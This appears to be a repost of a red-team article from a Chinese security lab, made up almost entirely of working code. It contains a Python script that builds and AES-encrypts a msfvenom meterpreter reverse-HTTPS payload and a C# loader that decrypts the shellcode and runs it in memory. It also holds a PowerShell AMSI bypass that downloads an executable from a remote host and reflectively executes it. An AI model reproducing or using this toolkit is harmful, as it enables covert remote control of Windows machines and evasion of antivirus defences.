文章来源 ：Khan安全攻防实验室

[email protected]:~# ./meterpreter_encryptor.py -p windows/x64/meterpreter/reverse_https -i 192.168.1.228 -l 443 -f b64[+] Generating MSFVENOM payload...[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload[-] No arch selected, selecting arch: x64 from the payloadFound 1 compatible encodersAttempting to encode payload with 1 iterations of x64/xor_dynamicx64/xor_dynamic succeeded with size 667 (iteration=0)x64/xor_dynamic chosen with final size 667Payload size: 667 bytesSaved as: ./msf.bin[+] Encrypting the payload, key=fjlmjiEgnQ4K6CjNCrPlqug1HW4icMec...[+] Base64 output:sZkMiiTitR5hQL2YXTBgjq91qq0FuEqgfR7YiKt2N1IZ8vqW3q/BrIYTjBb7nKLXCsJM25sRqh+R9WHGNsTV8webqwx7ZfAYSvlmEmzIJcKaBVdJO+Lbr7h9RomrOdyaPUAZ6P49lnsZFF1fdvnFOg/WvSdKUrx/eKEt5sNBn/Jz43y26mDEwEEqseydPQHyBcT9Av/ZkTQC6GZU8D+pQhKvXNdnlGrHJk4+G25me/Hzr0P1YuX9ZpGbyXb/pLdmdViAGAPtA/OORVt6xmij4AY24j8SLocUs2A6lSJZHYD2C1+DIc1Lyw8UJ6dtNIU2xDtsHCWX0OlkcjU+QoYpCavs78Y+OePjyBwkryWTzMyuKBgAREjbQQdsIn6dQZeqk/tKI/l6Fmhu27V+wFX7mxUP/KXWf9PI/3QYiuLmkJCWFBL9sINPbLVLePFSke8Ik3t+vp5SIcM+wMufg+TXBdUNpE//gTgCpblXdJfkkqVpMFBxnfX2vYPDcFLWteiNsnHCn9REbVB3MqJe5T55tO/CLq1KkZ2R7Z7rra6H8OhJgOLKEdJ/XHdZV9IFatAtRW2dxVo49P2YFmux2WSDiKhVRoCuLMVM6PeTuzsN+2qV4Zrq6tRAVLwmmTn5uflWER1aScePh6+6utXW/0jS+Hz7KiGP2//8+YDwzYbkLJnfn9B4AdmE4BuNTJRrv7tumsxboNkmWOx87lVElzn5ZM9OP721s8LiSyfkD1zm4o9j2u80syPeEU3PXvOU1epBTsTjdwRWlAYF+wzv3olAjPzR/xojjB602MIUNeCPn4fqDp6NjEokELcgawbWNl1vKYo4QEYgtlhVmqIkk2ooz527AEQb5EWQhkaZEWr4AAmGO1YfvYDCTcfUwV9p/jkg

// decrypt the base64 payloadstring payload = "sZkMii [etc...]";string key = "fjlmjiEgnQ4K6CjNCrPlqug1HW4icMec";

# AMSI bypass$a = [Ref].Assembly.GetTypes();ForEach($b in $a) {if ($b.Name -like "*iutils") {$c = $b}};$d = $c.GetFields('NonPublic,Static');ForEach($e in $d) {if ($e.Name -like "*itFailed") {$f = $e}};$f.SetValue($null,$true)
$bytes = (Invoke-WebRequest "http://192.168.1.228/metInject.exe").Content;$assembly = [System.Reflection.Assembly]::Load($bytes);$entryPointMethod = $assembly.GetType('ProcessInjection.Program', [Reflection.BindingFlags] 'Public, NonPublic').GetMethod('Main', [Reflection.BindingFlags] 'Static, Public, NonPublic');$entryPointMethod.Invoke($null, (, [string[]] ('', '')));

./meterpreter_encryptor.py -h                                                                     usage: meterpreter_encryptor.py [-h] [-l LPORT] [-i LHOST] [-p PAYLOAD] [-m METHOD] [-k KEY] [-e ENCODER] [-f FORMAT]
optional arguments:  -h, --help            show this help message and exit  -l LPORT, --lport LPORT                        The local port that msfconsole is listening on.  -i LHOST, --lhost LHOST                        The local host that msfconsole is listening on.  -p PAYLOAD, --payload PAYLOAD                        The payload to generate in msfvenom.  -m METHOD, --method METHOD                        The method to use: thread/delegate.  -k KEY, --key KEY     The encryption key (32 chars).  -e ENCODER, --encoder ENCODER                        The meterpreter encoder.  -f FORMAT, --format FORMAT                        The format to output.

using System;using System.Runtime.InteropServices;using System.Security.Cryptography;using System.Text;using System.IO;
namespace ProcessInjection{    class Program    {        public enum Protection        {            PAGE_NOACCESS = 0x01,            PAGE_READONLY = 0x02,            PAGE_READWRITE = 0x04,            PAGE_WRITECOPY = 0x08,            PAGE_EXECUTE = 0x10,            PAGE_EXECUTE_READ = 0x20,            PAGE_EXECUTE_READWRITE = 0x40,            PAGE_EXECUTE_WRITECOPY = 0x80,            PAGE_GUARD = 0x100,            PAGE_NOCACHE = 0x200,            PAGE_WRITECOMBINE = 0x400        }
        [DllImport("kernel32.dll")]        static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
        [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]        static extern IntPtr VirtualAllocExNuma(IntPtr hProcess, IntPtr lpAddress, uint dwSize, UInt32 flAllocationType, UInt32 flProtect, UInt32 nndPreferred);
        private delegate Int32 ShellcodeDelegate();
        static void Main(string[] args)        {            Shellcode();        }
        static void Shellcode()        {            // attempt heuristics/behaviour bypass            IntPtr mem = VirtualAllocExNuma(System.Diagnostics.Process.GetCurrentProcess().Handle, IntPtr.Zero, 0x1000, 0x3000, 0x4, 0);            if (mem == null)            {                return;            }
            // decrypt the base64 payload - change these to your own encrypted payload and key            string payload = "sZkMiiTitR5hQL2YXTBgjq91qq0FuEqgfR7YiKt2N1IZ8vqW3q/BrIYTjBb7nKLXCsJM25sRqh+R9WHGNsTV8webqwx7ZfAYSvlmEmzIJcKaBVdJO+Lbr7h9RomrOdyaPUAZ6P49lnsZFF1fdvnFOg/WvSdKUrx/eKEt5sNBn/Jz43y26mDEwEEqseydPQHyBcT9Av/ZkTQC6GZU8D+pQhKvXNdnlGrHJk4+G25me/Hzr0P1YuX9ZpGbyXb/pLdmdViAGAPtA/OORVt6xmij4AY24j8SLocUs2A6lSJZHYD2C1+DIc1Lyw8UJ6dtNIU2xDtsHCWX0OlkcjU+QoYpCavs78Y+OePjyBwkryWTzMyuKBgAREjbQQdsIn6dQZeqk/tKI/l6Fmhu27V+wFX7mxUP/KXWf9PI/3QYiuLmkJCWFBL9sINPbLVLePFSke8Ik3t+vp5SIcM+wMufg+TXBdUNpE//gTgCpblXdJfkkqVpMFBxnfX2vYPDcFLWteiNsnHCn9REbVB3MqJe5T55tO/CLq1KkZ2R7Z7rra6H8OhJgOLKEdJ/XHdZV9IFatAtRW2dxVo49P2YFmux2WSDiKhVRoCuLMVM6PeTuzsN+2qV4Zrq6tRAVLwmmTn5uflWER1aScePh6+6utXW/0jS+Hz7KiGP2//8+YDwzYbkLJnfn9B4AdmE4BuNTJRrv7tumsxboNkmWOx87lVElzn5ZM9OP721s8LiSyfkD1zm4o9j2u80syPeEU3PXvOU1epBTsTjdwRWlAYF+wzv3olAjPzR/xojjB602MIUNeCPn4fqDp6NjEokELcgawbWNl1vKYo4QEYgtlhVmqIkk2ooz527AEQb5EWQhkaZEWr4AAmGO1YfvYDCTcfUwV9p/jkg";            string key = "fjlmjiEgnQ4K6CjNCrPlqug1HW4icMec";
            byte[] buf = Decrypt(key, payload);
            unsafe            {                fixed(byte* ptr = buf)                {                    // set the memory as executable and execute the function pointer (as a delegate)                    IntPtr memoryAddress = (IntPtr)ptr;                    VirtualProtect(memoryAddress, (UIntPtr)buf.Length, (UInt32)Protection.PAGE_EXECUTE_READWRITE, out uint lpfOldProtect);
                    ShellcodeDelegate func = (ShellcodeDelegate)Marshal.GetDelegateForFunctionPointer(memoryAddress, typeof(ShellcodeDelegate));                    func();                }                }        }
        private static byte[] Decrypt(string key, string aes_base64)        {            byte[] tempKey = Encoding.ASCII.GetBytes(key);            tempKey = SHA256.Create().ComputeHash(tempKey);
            byte[] data = Convert.FromBase64String(aes_base64);
            // decrypt data            Aes aes = new AesManaged();            aes.Mode = CipherMode.CBC;            aes.Padding = PaddingMode.PKCS7;            ICryptoTransform dec = aes.CreateDecryptor(tempKey, SubArray(tempKey, 16));
            using (MemoryStream msDecrypt = new MemoryStream())            {                using (CryptoStream csDecrypt = new CryptoStream(msDecrypt, dec, CryptoStreamMode.Write))                {
                    csDecrypt.Write(data, 0, data.Length);
                    return msDecrypt.ToArray();                }            }        }
        static byte[] SubArray(byte[] a, int length)        {            byte[] b = new byte[length];            for (int i = 0; i < length; i++)            {                b[i] = a[i];            }            return b;        }    }}

#!/usr/bin/env python3import array, base64, random, stringfrom Crypto.Cipher import AESfrom hashlib import sha256import argparse, subprocess, os
def main():  args = parse_args()  lhost = args.lhost  lport = args.lport  key = args.key  if not key:    key = get_random_string(32)  payload = args.payload  method = args.method  format = args.format
  ''' generate msfvenom payload '''  print("[+] Generating MSFVENOM payload...")  result = subprocess.run(['msfvenom',    '-p', payload,    'LPORT=' + lport,    'LHOST=' + lhost,#    '-b', '\\x00',    '-f', 'raw',    '-o', './msf.bin'],    capture_output=False)
  f = open("./msf.bin", "rb")  buf = f.read()  f.close()
  print("[+] key and payload will be written to key.b64 and payload.b64")
  ''' encrypt the payload '''  print("[+] Encrypting the payload, key=" + key + "...")  hkey = hash_key(key)  encrypted = encrypt(hkey, hkey[:16], buf)  b64 = base64.b64encode(encrypted)
  f = open("./key.b64", "w")  f.write(key)  f.close()
  f = open("./payload.b64", "w")  f.write(b64.decode('utf-8'))  f.close()
  if format == "b64":    ''' base64 output '''    print("[+] Base64 output:")    print(b64.decode('utf-8'))    print("\n[+] Have a nice day!")    return  if format == "c":    ''' c output '''    print("[+] C output:")    hex_string = 'unsigned char payload[] ={0x';    hex = '0x'.join('{:02x},'.format(x) for x in encrypted)    hex_string = hex_string + hex[:-1] + "};"    print(hex_string)    print("\n[+] Have a nice day!")    return
def encrypt(key,iv,plaintext):  key_length = len(key)  if (key_length >= 32):    k = key[:32]  elif (key_length >= 24):    k = key[:24]  else:    k = key[:16]
  aes = AES.new(k, AES.MODE_CBC, iv)  pad_text = pad(plaintext, 16)  return aes.encrypt(pad_text)
def hash_key(key):  h = ''  for c in key:    h += hex(ord(c)).replace("0x", "")  h = bytes.fromhex(h)  hashed = sha256(h).digest()  return hashed
def pad(data, block_size):  padding_size = (block_size - len(data)) % block_size  if padding_size == 0:    padding_size = block_size  padding = (bytes([padding_size]) * padding_size)  return data + padding
def parse_args():  parser = argparse.ArgumentParser()
  parser.add_argument("-l", "--lport", default="0.0.0.0", type=str,    help="The local port that msfconsole is listening on.")  parser.add_argument("-i", "--lhost", default="443", type=str,      help="The local host that msfconsole is listening on.")  parser.add_argument("-p", "--payload", default = "windows/x64/meterpreter/reverse_https", type=str,    help="The payload to generate in msfvenom.")  parser.add_argument("-m", "--method", default="thread", type=str,    help="The method to use: thread/delegate.")  parser.add_argument("-k", "--key", default="", type=str,    help="The encryption key (32 chars).")

  parser.add_argument("-f", "--format", default="b64", type=str,    help="The format to output.")
  return parser.parse_args()
def get_random_string(length):  letters = string.ascii_letters + string.digits  result_str = ''.join(random.choice(letters) for i in range(length))  return result_str
if __name__ == '__main__':  main()